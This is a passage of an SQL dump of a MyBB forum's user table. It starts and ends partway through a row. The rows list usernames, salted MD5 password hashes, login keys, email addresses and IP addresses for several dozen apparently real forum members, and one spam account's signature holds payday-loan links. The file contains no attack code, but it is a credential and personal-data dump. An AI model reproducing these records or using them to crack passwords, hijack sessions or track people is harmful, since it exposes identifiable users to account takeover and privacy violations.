'6d39458d9f81fb4564acd416f55b97f2', 'znqCCJjf', '31xaJqREchlQp6knRBvaQi2yuBWWZQrDRxp5FRfYwvOIJORhCo', 'j.dm@aol.com', '0', '', '', '', '2', '', '0', '', '1345970266', '1345971568', '1345970266', '0', '', '0', '', '', '', '', 'all', '', '1', '0', '0', '0', '1', '0', '1', '0', 'linear', '1', '1', '1', '1', '0', '0', '0', '', '', '-4', '0', '2', '', '', '10', '0', '0', '0', '', '', '', '55', '0', '0', '24.126.110.197', '24.126.110.197', '410939077', '410939077', '', '35', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1', '0', '', '', 'b:0;', '0', '1'); INSERT INTO `mybb_users` (`uid`, `username`, `password`, `salt`, `loginkey`, `email`, `postnum`, `avatar`, `avatardimensions`, `avatartype`, `usergroup`, `additionalgroups`, `displaygroup`, `usertitle`, `regdate`, `lastactive`, `lastvisit`, `lastpost`, `website`, `icq`, `aim`, `yahoo`, `msn`, `birthday`, `birthdayprivacy`, `signature`, `allownotices`, `hideemail`, `subscriptionmethod`, `invisible`, `receivepms`, `receivefrombuddy`, `pmnotice`, `pmnotify`, `threadmode`, `showsigs`, `showavatars`, `showquickreply`, `showredirect`, `ppp`, `tpp`, `daysprune`, `dateformat`, `timeformat`, `timezone`, `dst`, `dstcorrection`, `buddylist`, `ignorelist`, `style`, `away`, `awaydate`, `returndate`, `awayreason`, `pmfolders`, `notepad`, `referrer`, `referrals`, `reputation`, `regip`, `lastip`, `longregip`, `longlastip`, `language`, `timeonline`, `showcodebuttons`, `totalpms`, `unreadpms`, `warningpoints`, `moderateposts`, `moderationtime`, `suspendposting`, `suspensiontime`, `suspendsignature`, `suspendsigtime`, `coppauser`, `classicpostbit`, `loginattempts`, `failedlogin`, `usernotes`, `privatewarning`, `achivements`, `threads`, `forcepwchange`) VALUES ('130', 'Control', '2af53e8c97f622180480aa1d743dc4a2', 'P15c2NSn', 'vsrjpTc4sfai6MEsRxobjasKGM87gx2rgl9lY4FuX3gpNU1Kfe', 'Jake-gagnier88@hotmail.com', '0', '', '', '', '2', '', '0', '', '1345970370', '1345970370', '1345970370', '0', '', '0', '', '', '', '', 'all', '', '1', '0', '0', '0', '1', '0', '1', '0', 'linear', '1', '1', '1', '1', '0', '0', '0', '', '', '-4', '0', '2', '', '', '10', '0', '0', '0', '', '', '', '55', '0', '0', '69.165.221.119', '', '1168498039', '0', '', '0', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1', '0', '', '', 'b:0;', '0', '1'); INSERT INTO `mybb_users` (`uid`, `username`, `password`, `salt`, `loginkey`, `email`, `postnum`, `avatar`, `avatardimensions`, `avatartype`, `usergroup`, `additionalgroups`, `displaygroup`, `usertitle`, `regdate`, `lastactive`, `lastvisit`, `lastpost`, `website`, `icq`, `aim`, `yahoo`, `msn`, `birthday`, `birthdayprivacy`, `signature`, `allownotices`, `hideemail`, `subscriptionmethod`, `invisible`, `receivepms`, `receivefrombuddy`, `pmnotice`, `pmnotify`, `threadmode`, `showsigs`, `showavatars`, `showquickreply`, `showredirect`, `ppp`, `tpp`, `daysprune`, `dateformat`, `timeformat`, `timezone`, `dst`, `dstcorrection`, `buddylist`, `ignorelist`, `style`, `away`, `awaydate`, `returndate`, `awayreason`, `pmfolders`, `notepad`, `referrer`, `referrals`, `reputation`, `regip`, `lastip`, `longregip`, `longlastip`, `language`, `timeonline`, `showcodebuttons`, `totalpms`, `unreadpms`, `warningpoints`, `moderateposts`, `moderationtime`, `suspendposting`, `suspensiontime`, `suspendsignature`, `suspendsigtime`, `coppauser`, `classicpostbit`, `loginattempts`, `failedlogin`, `usernotes`, `privatewarning`, `achivements`, `threads`, `forcepwchange`) VALUES ('131', 'bramieboy100', 'bee0b91ea11a73ee26e79e22e7e1200e', 'Brh6qxhI', '9kZYeaqraWlwLl5UT9bzX7F5K7FaGNIICUdYUFHWPEhYOPHAle', 'bram.livie@live.nl', '0', '', '', '', '2', '', '0', '', '1345974742', '1345975455', '1345974742', '0', '', '0', '', '', '', '', 'all', '', '1', '0', '0', '0', '1', '0', '2', '0', 'linear', '1', '1', '1', '1', '0', '0', '0', '', '', '-4', '0', '2', '', '', '10', '0', '0', '0', '', '', '', '0', '0', '0', '217.123.173.181', '217.123.173.181', '-646206027', '-646206027', '', '713', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1', '0', '', '', 'b:0;', '0', '1'); INSERT INTO `mybb_users` (`uid`, `username`, `password`, `salt`, `loginkey`, `email`, `postnum`, `avatar`, `avatardimensions`, `avatartype`, `usergroup`, `additionalgroups`, `displaygroup`, `usertitle`, `regdate`, `lastactive`, `lastvisit`, `lastpost`, `website`, `icq`, `aim`, `yahoo`, `msn`, `birthday`, `birthdayprivacy`, `signature`, `allownotices`, `hideemail`, `subscriptionmethod`, `invisible`, `receivepms`, `receivefrombuddy`, `pmnotice`, `pmnotify`, `threadmode`, `showsigs`, `showavatars`, `showquickreply`, `showredirect`, `ppp`, `tpp`, `daysprune`, `dateformat`, `timeformat`, `timezone`, `dst`, `dstcorrection`, `buddylist`, `ignorelist`, `style`, `away`, `awaydate`, `returndate`, `awayreason`, `pmfolders`, `notepad`, `referrer`, `referrals`, `reputation`, `regip`, `lastip`, `longregip`, `longlastip`, `language`, `timeonline`, `showcodebuttons`, `totalpms`, `unreadpms`, `warningpoints`, `moderateposts`, `moderationtime`, `suspendposting`, `suspensiontime`, `suspendsignature`, `suspendsigtime`, `coppauser`, `classicpostbit`, `loginattempts`, `failedlogin`, `usernotes`, `privatewarning`, `achivements`, `threads`, `forcepwchange`) VALUES ('132', 'Sdlive', '10a6d6af2788b640883d5eb2f8481bd5', 'SuytTuCt', 'YuULZk9rG52UJCMP7QakQtrJBrSaiQ87qPQHPiXhZeYxPFZq3B', 'JoeGrizzly86@yahoo.com', '0', '', '', '', '2', '', '0', '', '1346036311', '1346620766', '1346552568', '0', '', '0', '', '', '', '', 'all', '', '1', '0', '0', '0', '1', '0', '1', '0', 'linear', '1', '1', '1', '1', '0', '0', '0', '', '', '-4', '1', '2', '', '', '10', '0', '0', '0', '', '', '', '0', '0', '0', '24.50.23.117', '24.50.23.117', '405935989', '405935989', '', '1154', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1', '0', '', '', 'b:0;', '0', '1'); INSERT INTO `mybb_users` (`uid`, `username`, `password`, `salt`, `loginkey`, `email`, `postnum`, `avatar`, `avatardimensions`, `avatartype`, `usergroup`, `additionalgroups`, `displaygroup`, `usertitle`, `regdate`, `lastactive`, `lastvisit`, `lastpost`, `website`, `icq`, `aim`, `yahoo`, `msn`, `birthday`, `birthdayprivacy`, `signature`, `allownotices`, `hideemail`, `subscriptionmethod`, `invisible`, `receivepms`, `receivefrombuddy`, `pmnotice`, `pmnotify`, `threadmode`, `showsigs`, `showavatars`, `showquickreply`, `showredirect`, `ppp`, `tpp`, `daysprune`, `dateformat`, `timeformat`, `timezone`, `dst`, `dstcorrection`, `buddylist`, `ignorelist`, `style`, `away`, `awaydate`, `returndate`, `awayreason`, `pmfolders`, `notepad`, `referrer`, `referrals`, `reputation`, `regip`, `lastip`, `longregip`, `longlastip`, `language`, `timeonline`, `showcodebuttons`, `totalpms`, `unreadpms`, `warningpoints`, `moderateposts`, `moderationtime`, `suspendposting`, `suspensiontime`, `suspendsignature`, `suspendsigtime`, `coppauser`, `classicpostbit`, `loginattempts`, `failedlogin`, `usernotes`, `privatewarning`, `achivements`, `threads`, `forcepwchange`) VALUES ('133', 'fredxue', '62daa84941343006784b5a7494dae00e', 'lwLDf71O', 'NnjhcXQc23oCbwhFn81okg1Fn24KNq8QP4N1nJYnkUC1FEUpnF', 'fredxyt@gmail.com', '0', '', '', '', '2', '', '0', '', '1346040899', '1346040899', '1346040899', '0', '', '0', '', '', '', '', 'all', '', '1', '0', '0', '0', '1', '0', '1', '0', 'linear', '1', '1', '1', '1', '0', '0', '0', '', '', '-4', '0', '2', '', '', '10', '0', '0', '0', '', '', '', '0', '0', '0', '74.125.178.84', '', '1249751636', '0', '', '0', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1', '0', '', '', 'b:0;', '0', '1'); INSERT INTO `mybb_users` (`uid`, `username`, `password`, `salt`, `loginkey`, `email`, `postnum`, `avatar`, `avatardimensions`, `avatartype`, `usergroup`, `additionalgroups`, `displaygroup`, `usertitle`, `regdate`, `lastactive`, `lastvisit`, `lastpost`, `website`, `icq`, `aim`, `yahoo`, `msn`, `birthday`, `birthdayprivacy`, `signature`, `allownotices`, `hideemail`, `subscriptionmethod`, `invisible`, `receivepms`, `receivefrombuddy`, `pmnotice`, `pmnotify`, `threadmode`, `showsigs`, `showavatars`, `showquickreply`, `showredirect`, `ppp`, `tpp`, `daysprune`, `dateformat`, `timeformat`, `timezone`, `dst`, `dstcorrection`, `buddylist`, `ignorelist`, `style`, `away`, `awaydate`, `returndate`, `awayreason`, `pmfolders`, `notepad`, `referrer`, `referrals`, `reputation`, `regip`, `lastip`, `longregip`, `longlastip`, `language`, `timeonline`, `showcodebuttons`, `totalpms`, `unreadpms`, `warningpoints`, `moderateposts`, `moderationtime`, `suspendposting`, `suspensiontime`, `suspendsignature`, `suspendsigtime`, `coppauser`, `classicpostbit`, `loginattempts`, `failedlogin`, `usernotes`, `privatewarning`, `achivements`, `threads`, `forcepwchange`) VALUES ('134', 'marketmessenger', 'eadb88275c078d4b5608c6ce9e8d5a75', 'zTHJRUGF', 'Xi2Jn5GSZrCr4EfrawzgqDu8bGQcwwnVmR1ac8yn6koEVEZ49e', 'marketmessenger@yahoo.com', '0', '', '', '', '2', '', '0', '', '1346085676', '1346085676', '1346085676', '0', '', '0', '', '', '', '', 'all', '', '1', '0', '0', '0', '1', '0', '1', '0', 'linear', '1', '1', '1', '1', '0', '0', '0', '', '', '-4', '0', '2', '', '', '10', '0', '0', '0', '', '', '', '0', '0', '0', '173.254.206.179', '', '-1375809869', '0', '', '0', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1', '0', '', '', 'b:0;', '0', '1'); INSERT INTO `mybb_users` (`uid`, `username`, `password`, `salt`, `loginkey`, `email`, `postnum`, `avatar`, `avatardimensions`, `avatartype`, `usergroup`, `additionalgroups`, `displaygroup`, `usertitle`, `regdate`, `lastactive`, `lastvisit`, `lastpost`, `website`, `icq`, `aim`, `yahoo`, `msn`, `birthday`, `birthdayprivacy`, `signature`, `allownotices`, `hideemail`, `subscriptionmethod`, `invisible`, `receivepms`, `receivefrombuddy`, `pmnotice`, `pmnotify`, `threadmode`, `showsigs`, `showavatars`, `showquickreply`, `showredirect`, `ppp`, `tpp`, `daysprune`, `dateformat`, `timeformat`, `timezone`, `dst`, `dstcorrection`, `buddylist`, `ignorelist`, `style`, `away`, `awaydate`, `returndate`, `awayreason`, `pmfolders`, `notepad`, `referrer`, `referrals`, `reputation`, `regip`, `lastip`, `longregip`, `longlastip`, `language`, `timeonline`, `showcodebuttons`, `totalpms`, `unreadpms`, `warningpoints`, `moderateposts`, `moderationtime`, `suspendposting`, `suspensiontime`, `suspendsignature`, `suspendsigtime`, `coppauser`, `classicpostbit`, `loginattempts`, `failedlogin`, `usernotes`, `privatewarning`, `achivements`, `threads`, `forcepwchange`) VALUES ('135', 'v1rus', 'f74fe0a84c2fa7c9e32159c7ac1537e1', 'zGDfsikR', 'E8JjSMYK3z926mLMej6TLirLLiJpX3IDCMF289zyaHVzmgYCDu', 'levisdani@yahoo.com', '0', '', '', '', '2', '', '0', '', '1346112256', '1346112256', '1346112256', '0', '', '0', '', '', '', '', 'all', '', '1', '0', '0', '0', '1', '0', '1', '0', 'linear', '1', '1', '1', '1', '0', '0', '0', '', '', '-4', '0', '2', '', '', '10', '0', '0', '0', '', '', '', '0', '0', '0', '41.191.242.98', '', '700445282', '0', '', '0', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1', '0', '', '', 'b:0;', '0', '1'); INSERT INTO `mybb_users` (`uid`, `username`, `password`, `salt`, `loginkey`, `email`, `postnum`, `avatar`, `avatardimensions`, `avatartype`, `usergroup`, `additionalgroups`, `displaygroup`, `usertitle`, `regdate`, `lastactive`, `lastvisit`, `lastpost`, `website`, `icq`, `aim`, `yahoo`, `msn`, `birthday`, `birthdayprivacy`, `signature`, `allownotices`, `hideemail`, `subscriptionmethod`, `invisible`, `receivepms`, `receivefrombuddy`, `pmnotice`, `pmnotify`, `threadmode`, `showsigs`, `showavatars`, `showquickreply`, `showredirect`, `ppp`, `tpp`, `daysprune`, `dateformat`, `timeformat`, `timezone`, `dst`, `dstcorrection`, `buddylist`, `ignorelist`, `style`, `away`, `awaydate`, `returndate`, `awayreason`, `pmfolders`, `notepad`, `referrer`, `referrals`, `reputation`, `regip`, `lastip`, `longregip`, `longlastip`, `language`, `timeonline`, `showcodebuttons`, `totalpms`, `unreadpms`, `warningpoints`, `moderateposts`, `moderationtime`, `suspendposting`, `suspensiontime`, `suspendsignature`, `suspendsigtime`, `coppauser`, `classicpostbit`, `loginattempts`, `failedlogin`, `usernotes`, `privatewarning`, `achivements`, `threads`, `forcepwchange`) VALUES ('138', 'Dreamer', '421ee02468280d2f16c23917e5e9be77', 'Steo3Hxo', 'KIsteiMlQeOogo3SoDlfhJxpXEqhPg1fiNrRfsYjDFRBwxg6Wg', 'tehmodder1@gmail.com', '2', '', '', '', '2', '', '0', '', '1346168589', '1346959057', '1346876030', '1346171506', '', '0', '', '', '', '', 'all', '[align=center][img]http://i.imgur.com/KULDE.gif[/img][/align] [color=#FFD700][b][align=center]Need any FREE Help or advice? PM me![/align][/b][/color]', '1', '0', '0', '0', '1', '0', '1', '0', 'linear', '1', '1', '1', '1', '0', '0', '0', '0', '0', '-4', '0', '2', '', '', '10', '0', '0', '0', '', '1**Inbox$%%$2**Sent Items$%%$3**Drafts$%%$4**Trash Can', '', '0', '0', '0', '71.207.111.91', '71.207.111.91', '1204776795', '1204776795', '', '5161', '1', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1', '0', '', '', 'b:0;', '2', '1'); INSERT INTO `mybb_users` (`uid`, `username`, `password`, `salt`, `loginkey`, `email`, `postnum`, `avatar`, `avatardimensions`, `avatartype`, `usergroup`, `additionalgroups`, `displaygroup`, `usertitle`, `regdate`, `lastactive`, `lastvisit`, `lastpost`, `website`, `icq`, `aim`, `yahoo`, `msn`, `birthday`, `birthdayprivacy`, `signature`, `allownotices`, `hideemail`, `subscriptionmethod`, `invisible`, `receivepms`, `receivefrombuddy`, `pmnotice`, `pmnotify`, `threadmode`, `showsigs`, `showavatars`, `showquickreply`, `showredirect`, `ppp`, `tpp`, `daysprune`, `dateformat`, `timeformat`, `timezone`, `dst`, `dstcorrection`, `buddylist`, `ignorelist`, `style`, `away`, `awaydate`, `returndate`, `awayreason`, `pmfolders`, `notepad`, `referrer`, `referrals`, `reputation`, `regip`, `lastip`, `longregip`, `longlastip`, `language`, `timeonline`, `showcodebuttons`, `totalpms`, `unreadpms`, `warningpoints`, `moderateposts`, `moderationtime`, `suspendposting`, `suspensiontime`, `suspendsignature`, `suspendsigtime`, `coppauser`, `classicpostbit`, `loginattempts`, `failedlogin`, `usernotes`, `privatewarning`, `achivements`, `threads`, `forcepwchange`) VALUES ('136', 'Check', 'a7703028f26c16f064dc2be00660c4f9', 'vyoGegp8', 'v2Bz42p2bVg6rOaWV1gKsgAiNUf25KEI4C89zylo7nHSCKruuI', 'check_validity@yahoo.com', '0', '', '', '', '2', '', '0', '', '1346119444', '1347855440', '1346119444', '0', '', '0', '', '', '', '', 'all', '', '1', '0', '0', '0', '1', '0', '1', '0', 'linear', '1', '1', '1', '1', '0', '0', '0', '0', '0', '-4', '0', '2', '', '', '10', '0', '0', '0', '', '', '', '0', '0', '0', '41.191.242.98', '72.231.24.165', '700445282', '1223104677', '', '73', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1', '0', '', '', 'b:0;', '0', '1'); INSERT INTO `mybb_users` (`uid`, `username`, `password`, `salt`, `loginkey`, `email`, `postnum`, `avatar`, `avatardimensions`, `avatartype`, `usergroup`, `additionalgroups`, `displaygroup`, `usertitle`, `regdate`, `lastactive`, `lastvisit`, `lastpost`, `website`, `icq`, `aim`, `yahoo`, `msn`, `birthday`, `birthdayprivacy`, `signature`, `allownotices`, `hideemail`, `subscriptionmethod`, `invisible`, `receivepms`, `receivefrombuddy`, `pmnotice`, `pmnotify`, `threadmode`, `showsigs`, `showavatars`, `showquickreply`, `showredirect`, `ppp`, `tpp`, `daysprune`, `dateformat`, `timeformat`, `timezone`, `dst`, `dstcorrection`, `buddylist`, `ignorelist`, `style`, `away`, `awaydate`, `returndate`, `awayreason`, `pmfolders`, `notepad`, `referrer`, `referrals`, `reputation`, `regip`, `lastip`, `longregip`, `longlastip`, `language`, `timeonline`, `showcodebuttons`, `totalpms`, `unreadpms`, `warningpoints`, `moderateposts`, `moderationtime`, `suspendposting`, `suspensiontime`, `suspendsignature`, `suspendsigtime`, `coppauser`, `classicpostbit`, `loginattempts`, `failedlogin`, `usernotes`, `privatewarning`, `achivements`, `threads`, `forcepwchange`) VALUES ('137', 'Nox', 'a1a9f3c1ac7c7658ac9eba95605c0c10', 'MZs1yK9J', 'jlQl6ZJTz9sBWzdDDzCUM4QlpIeqa6N7Duled2gMOioRpnlTvQ', 'noxzie@hotmail.com', '0', '', '', '', '2', '', '0', '', '1346124687', '1346124971', '1346124687', '0', '', '0', '', '', '', '', 'all', '', '1', '0', '0', '0', '1', '0', '1', '0', 'linear', '1', '1', '1', '1', '0', '0', '0', '', '', '-4', '0', '2', '', '', '10', '0', '0', '0', '', '', '', '0', '0', '0', '142.161.233.109', '142.161.233.109', '-1901991571', '-1901991571', '', '284', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1', '0', '', '', 'b:0;', '0', '1'); INSERT INTO `mybb_users` (`uid`, `username`, `password`, `salt`, `loginkey`, `email`, `postnum`, `avatar`, `avatardimensions`, `avatartype`, `usergroup`, `additionalgroups`, `displaygroup`, `usertitle`, `regdate`, `lastactive`, `lastvisit`, `lastpost`, `website`, `icq`, `aim`, `yahoo`, `msn`, `birthday`, `birthdayprivacy`, `signature`, `allownotices`, `hideemail`, `subscriptionmethod`, `invisible`, `receivepms`, `receivefrombuddy`, `pmnotice`, `pmnotify`, `threadmode`, `showsigs`, `showavatars`, `showquickreply`, `showredirect`, `ppp`, `tpp`, `daysprune`, `dateformat`, `timeformat`, `timezone`, `dst`, `dstcorrection`, `buddylist`, `ignorelist`, `style`, `away`, `awaydate`, `returndate`, `awayreason`, `pmfolders`, `notepad`, `referrer`, `referrals`, `reputation`, `regip`, `lastip`, `longregip`, `longlastip`, `language`, `timeonline`, `showcodebuttons`, `totalpms`, `unreadpms`, `warningpoints`, `moderateposts`, `moderationtime`, `suspendposting`, `suspensiontime`, `suspendsignature`, `suspendsigtime`, `coppauser`, `classicpostbit`, `loginattempts`, `failedlogin`, `usernotes`, `privatewarning`, `achivements`, `threads`, `forcepwchange`) VALUES ('139', 'Guzzie', 'f8049e16e4f6fba910f5ae271b4ce6c8', 'jDxrPG63', 'NTrfvsgTc3yuUn6UQWX8gdKMEOqTFa2B8YenWHh5xVuUcDvsZ5', 'danny.spaan@hotmail.com', '0', '', '', '', '2', '', '0', '', '1346188577', '1346531651', '1346530512', '0', '', '0', '', '', '', '', 'all', '', '1', '0', '0', '0', '1', '0', '1', '0', 'linear', '1', '1', '1', '1', '0', '0', '0', '0', '0', '-4', '0', '2', '', '', '10', '0', '0', '0', '', '', '', '0', '0', '0', '24.132.198.229', '24.132.198.229', '411354853', '411354853', '', '417', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1', '0', '', '', 'b:0;', '0', '1'); INSERT INTO `mybb_users` (`uid`, `username`, `password`, `salt`, `loginkey`, `email`, `postnum`, `avatar`, `avatardimensions`, `avatartype`, `usergroup`, `additionalgroups`, `displaygroup`, `usertitle`, `regdate`, `lastactive`, `lastvisit`, `lastpost`, `website`, `icq`, `aim`, `yahoo`, `msn`, `birthday`, `birthdayprivacy`, `signature`, `allownotices`, `hideemail`, `subscriptionmethod`, `invisible`, `receivepms`, `receivefrombuddy`, `pmnotice`, `pmnotify`, `threadmode`, `showsigs`, `showavatars`, `showquickreply`, `showredirect`, `ppp`, `tpp`, `daysprune`, `dateformat`, `timeformat`, `timezone`, `dst`, `dstcorrection`, `buddylist`, `ignorelist`, `style`, `away`, `awaydate`, `returndate`, `awayreason`, `pmfolders`, `notepad`, `referrer`, `referrals`, `reputation`, `regip`, `lastip`, `longregip`, `longlastip`, `language`, `timeonline`, `showcodebuttons`, `totalpms`, `unreadpms`, `warningpoints`, `moderateposts`, `moderationtime`, `suspendposting`, `suspensiontime`, `suspendsignature`, `suspendsigtime`, `coppauser`, `classicpostbit`, `loginattempts`, `failedlogin`, `usernotes`, `privatewarning`, `achivements`, `threads`, `forcepwchange`) VALUES ('141', 'Bane™', 'a14aa2f20e22de2d6328d218cf12b9bf', '7I3MPITs', 'llk2DHyTcR6mweioyP7lv6wVGLehuHspmMBVg3f5XETc87OdW4', 'dienhardgfx@gmail.com', '10', './uploads/avatars/avatar_141.png?dateline=1346197719', '120|150', 'upload', '2', '', '0', '', '1346191779', '1346702906', '1346625589', '1346618430', '', '0', '', '', '', '', 'all', '', '1', '0', '0', '0', '1', '0', '1', '0', 'linear', '1', '1', '1', '1', '0', '0', '0', '0', '0', '-4', '0', '2', '', '', '10', '0', '0', '0', '', '1**Inbox$%%$2**Sent Items$%%$3**Drafts$%%$4**Trash Can', '', '0', '0', '10', '72.134.24.117', '72.134.24.117', '1216747637', '1216747637', '', '5479', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1', '0', '', '', 'b:0;', '2', '1'); INSERT INTO `mybb_users` (`uid`, `username`, `password`, `salt`, `loginkey`, `email`, `postnum`, `avatar`, `avatardimensions`, `avatartype`, `usergroup`, `additionalgroups`, `displaygroup`, `usertitle`, `regdate`, `lastactive`, `lastvisit`, `lastpost`, `website`, `icq`, `aim`, `yahoo`, `msn`, `birthday`, `birthdayprivacy`, `signature`, `allownotices`, `hideemail`, `subscriptionmethod`, `invisible`, `receivepms`, `receivefrombuddy`, `pmnotice`, `pmnotify`, `threadmode`, `showsigs`, `showavatars`, `showquickreply`, `showredirect`, `ppp`, `tpp`, `daysprune`, `dateformat`, `timeformat`, `timezone`, `dst`, `dstcorrection`, `buddylist`, `ignorelist`, `style`, `away`, `awaydate`, `returndate`, `awayreason`, `pmfolders`, `notepad`, `referrer`, `referrals`, `reputation`, `regip`, `lastip`, `longregip`, `longlastip`, `language`, `timeonline`, `showcodebuttons`, `totalpms`, `unreadpms`, `warningpoints`, `moderateposts`, `moderationtime`, `suspendposting`, `suspensiontime`, `suspendsignature`, `suspendsigtime`, `coppauser`, `classicpostbit`, `loginattempts`, `failedlogin`, `usernotes`, `privatewarning`, `achivements`, `threads`, `forcepwchange`) VALUES ('147', 'Tiq3reye', '576d6b55bf9bbc66cd8dd8f91081e968', 'D4g8Jvl6', 'ucFwCnFLUuHbeQVEasBoh7ZJyGPGujTyqhAAgnU4mnVgHy5crm', 'tiq3reye@gmail.com', '0', '', '', '', '2', '', '0', '', '1346266776', '1346266848', '1346266776', '0', '', '0', '', '', '', '', 'all', '', '1', '0', '0', '0', '1', '0', '1', '0', 'linear', '1', '1', '1', '1', '0', '0', '0', '', '', '1', '1', '2', '', '', '10', '0', '0', '0', '', '1**Inbox$%%$2**Sent Items$%%$3**Drafts$%%$4**Trash Can', '', '0', '0', '0', '188.22.16.120', '188.22.16.120', '-1139404680', '-1139404680', '', '72', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1', '0', '', '', 'b:0;', '0', '1'); INSERT INTO `mybb_users` (`uid`, `username`, `password`, `salt`, `loginkey`, `email`, `postnum`, `avatar`, `avatardimensions`, `avatartype`, `usergroup`, `additionalgroups`, `displaygroup`, `usertitle`, `regdate`, `lastactive`, `lastvisit`, `lastpost`, `website`, `icq`, `aim`, `yahoo`, `msn`, `birthday`, `birthdayprivacy`, `signature`, `allownotices`, `hideemail`, `subscriptionmethod`, `invisible`, `receivepms`, `receivefrombuddy`, `pmnotice`, `pmnotify`, `threadmode`, `showsigs`, `showavatars`, `showquickreply`, `showredirect`, `ppp`, `tpp`, `daysprune`, `dateformat`, `timeformat`, `timezone`, `dst`, `dstcorrection`, `buddylist`, `ignorelist`, `style`, `away`, `awaydate`, `returndate`, `awayreason`, `pmfolders`, `notepad`, `referrer`, `referrals`, `reputation`, `regip`, `lastip`, `longregip`, `longlastip`, `language`, `timeonline`, `showcodebuttons`, `totalpms`, `unreadpms`, `warningpoints`, `moderateposts`, `moderationtime`, `suspendposting`, `suspensiontime`, `suspendsignature`, `suspendsigtime`, `coppauser`, `classicpostbit`, `loginattempts`, `failedlogin`, `usernotes`, `privatewarning`, `achivements`, `threads`, `forcepwchange`) VALUES ('144', 'TheOne™', '339273f8b07bbb8daac6f149af39881f', 'IZZN44je', 'eVdJ4oL9k1kf4UhkJAntNkbdcyFNhVRbOjZJJa25weCRRR8dMw', 'keano4spurs@live.co.uk', '1', '', '', '', '2', '', '0', '', '1346253791', '1346267703', '1346262438', '1346254192', '', '0', '', '', '', '', 'all', '', '1', '0', '0', '0', '1', '0', '1', '0', 'linear', '1', '1', '1', '1', '0', '0', '0', '0', '0', '-4', '0', '2', '', '', '10', '0', '0', '0', '', '1**Inbox$%%$2**Sent Items$%%$3**Drafts$%%$4**Trash Can', '', '1', '0', '0', '86.24.67.92', '86.24.143.245', '1444430684', '1444450293', '', '1143', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1', '0', '', '', 'b:0;', '0', '1'); INSERT INTO `mybb_users` (`uid`, `username`, `password`, `salt`, `loginkey`, `email`, `postnum`, `avatar`, `avatardimensions`, `avatartype`, `usergroup`, `additionalgroups`, `displaygroup`, `usertitle`, `regdate`, `lastactive`, `lastvisit`, `lastpost`, `website`, `icq`, `aim`, `yahoo`, `msn`, `birthday`, `birthdayprivacy`, `signature`, `allownotices`, `hideemail`, `subscriptionmethod`, `invisible`, `receivepms`, `receivefrombuddy`, `pmnotice`, `pmnotify`, `threadmode`, `showsigs`, `showavatars`, `showquickreply`, `showredirect`, `ppp`, `tpp`, `daysprune`, `dateformat`, `timeformat`, `timezone`, `dst`, `dstcorrection`, `buddylist`, `ignorelist`, `style`, `away`, `awaydate`, `returndate`, `awayreason`, `pmfolders`, `notepad`, `referrer`, `referrals`, `reputation`, `regip`, `lastip`, `longregip`, `longlastip`, `language`, `timeonline`, `showcodebuttons`, `totalpms`, `unreadpms`, `warningpoints`, `moderateposts`, `moderationtime`, `suspendposting`, `suspensiontime`, `suspendsignature`, `suspendsigtime`, `coppauser`, `classicpostbit`, `loginattempts`, `failedlogin`, `usernotes`, `privatewarning`, `achivements`, `threads`, `forcepwchange`) VALUES ('148', 'ryoazuma', '17b9e0aeb96ae5d79fcc2703e3133e1b', 'oFVpJiNQ', '4VrfJ8N97Kid4Yv5dFZiMqfMrkBggkRciab6zXpjyem9Y99Osx', 'twitchpeep@gmail.com', '0', '', '', '', '2', '', '0', '', '1346306195', '1346306562', '1346306195', '0', '', '0', '', '', '', '', 'all', '', '1', '0', '0', '0', '1', '0', '0', '0', 'linear', '1', '1', '1', '1', '0', '0', '0', '', '', '-4', '0', '2', '', '', '10', '0', '0', '0', '', '', '', '0', '0', '0', '183.83.29.21', '183.83.29.21', '-1219289835', '-1219289835', '', '367', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1', '0', '', '', 'b:0;', '0', '1'); INSERT INTO `mybb_users` (`uid`, `username`, `password`, `salt`, `loginkey`, `email`, `postnum`, `avatar`, `avatardimensions`, `avatartype`, `usergroup`, `additionalgroups`, `displaygroup`, `usertitle`, `regdate`, `lastactive`, `lastvisit`, `lastpost`, `website`, `icq`, `aim`, `yahoo`, `msn`, `birthday`, `birthdayprivacy`, `signature`, `allownotices`, `hideemail`, `subscriptionmethod`, `invisible`, `receivepms`, `receivefrombuddy`, `pmnotice`, `pmnotify`, `threadmode`, `showsigs`, `showavatars`, `showquickreply`, `showredirect`, `ppp`, `tpp`, `daysprune`, `dateformat`, `timeformat`, `timezone`, `dst`, `dstcorrection`, `buddylist`, `ignorelist`, `style`, `away`, `awaydate`, `returndate`, `awayreason`, `pmfolders`, `notepad`, `referrer`, `referrals`, `reputation`, `regip`, `lastip`, `longregip`, `longlastip`, `language`, `timeonline`, `showcodebuttons`, `totalpms`, `unreadpms`, `warningpoints`, `moderateposts`, `moderationtime`, `suspendposting`, `suspensiontime`, `suspendsignature`, `suspendsigtime`, `coppauser`, `classicpostbit`, `loginattempts`, `failedlogin`, `usernotes`, `privatewarning`, `achivements`, `threads`, `forcepwchange`) VALUES ('248', 'ArianaR1956', 'e25dbc9a906ab2a3498c50086c3e6d79', 'njYCYwRA', 'emupbwRE9vYBlXLLb5UKWr96GXsXdA3Uot5YT2cv7L6BNM9LzZ', 'Lillyjgb2581@yahoo.com', '0', '', '', '', '2', '', '0', '', '1349759153', '1349854547', '1349759153', '0', 'http://www.extratasty.com/profile/59605/cameranleon1969', '0', '', '', '', '3-2-1956', 'all', '[url=http://ostatic.org/member/seanlamb1959]cash advance provider[/url] [url=http://www.irmavs.com/users/KeaneHorn1948]payday loans without a bank account[/url]', '1', '0', '0', '0', '1', '0', '1', '0', 'linear', '1', '1', '1', '1', '0', '0', '0', '', '', '-4', '0', '2', '', '', '0', '0', '0', '0', '', '1**Inbox$%%$2**Sent 